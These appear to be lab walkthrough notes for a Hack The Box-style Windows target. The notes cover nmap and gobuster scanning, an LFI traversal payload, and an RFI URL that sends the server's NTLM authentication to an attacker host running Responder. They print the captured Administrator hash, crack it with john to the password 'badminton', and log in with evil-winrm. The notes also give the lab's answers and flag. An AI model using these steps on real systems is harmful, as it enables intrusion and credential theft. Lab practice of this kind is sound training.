Respond
Target Information:
- IP: 10.129.113.205
- TCP Port 80: Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
==============================================================
Task #1: When visiting the web service using the IP address, what is the domain that we are being redirected to?
- A: unika.htb
- To visit:
- Edit
/etc/hosts
to include10.129.113.205 unika.htb
- This allows us to access a custom TLD
- Edit
Task #2: Which scripting language is being used on the server to generate webpages?
-
A: PHP
-
nmap 10.129.113.205 -sC -sV -T4 -Pn -p-
$ nmap 10.129.113.205 -sC -sV -T4 -Pn -p- Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-13 14:46 EST Nmap scan report for unika.htb (10.129.113.205) Host is up (0.11s latency). Not shown: 65532 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 |_http-title: Unika 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 7680/tcp open pando-pub? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Task #3: What is the name of the URL parameter which is used to load different language versions of the webpage?
- A: page
gobuster dir --url 10.129.113.205 --wordlist common.txt
- DE example: http://unika.htb/index.php?page=german.html
Task #4: Which of the following values for the page
parameter would be an example of exploiting a Local File Include (LFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
- A: ../../../../../../../../windows/system32/drivers/etc/hosts
- Check if LFI works:
Task #5: Which of the following values for the page
parameter would be an example of exploiting a Remote File Include (RFI) vulnerability: "french.html", "//10.10.14.6/somefile", "../../../../../../../../windows/system32/drivers/etc/hosts", "minikatz.exe"
- A: //10.10.14.6/somefile
Task #6: What does NTLM stand for?
- A: New Technology LAN Manager
Task #7: Which flag do we use in the Responder utility to specify the network interface?
- A: -I
- https://www.kali.org/tools/responder/
sudo git clone https://github.com/lgandx/Responder /opt/Responder
- Add
alias responder="python3 /opt/Responder/Responder.py"
in~/.bashrc
, then source pip3 install netifaces
sudo python3 /opt/Responder/Responder.py -I tun0
- TODO: RESEARCH WHAT tun0 IS!
Task #8: There are several tools that take a NetNTLMv2 challenge/response and try millions of passwords to see if any of them generate the same response. One such tool is often referred to as john
, but the full name is what?
- A: john the ripper
Task #9: What is the password for the administrator user?
-
A:
-
Use remote file inclusion from the Responder server IP:
-
Make sure
responder
is still running -
Visit "http://unika.htb/index.php?page=//10.10.16.143/anything", which will capture the NTLM hash
Administrator::RESPONDER:63ff936b9fdc75cb:DBE9D33020961DEF69B126BD7CE26720:01010000000000008034D7BB000FD9011E353DFAF6081B2A00000000020008005A004D005000500001001E00570049004E002D005100390052005A0034005500510043005A005100470004003400570049004E002D005100390052005A0034005500510043005A00510047002E005A004D00500050002E004C004F00430041004C00030014005A004D00500050002E004C004F00430041004C00050014005A004D00500050002E004C004F00430041004C00070008008034D7BB000FD901060004000200000008003000300000000000000001000000002000001465C479D5A200159384C019FB8E6AEE1BF77C342485E468A68AF6E605CA90440A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310036002E003100340033000000000000000000
-
-
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
!>badminton
Task #10: We'll use a Windows service (i.e. running on the box) to remotely access the Responder machine using the password we recovered. What port TCP does it listen on?
- A:
5985
- Info from the
nmap
scan from earlier; service is WimRM (source) - Can exploit with evil-winrm
sudo apt install ruby rbenv ruby-dev
gem install evil-winrm
Submit root flag: ea81b7afddd03efaa0945333ed147fac
evil-winrm -u Administrator -p 'badminton' -i 10.129.113.205
cat C:/Users/mike/Desktop/flag.txt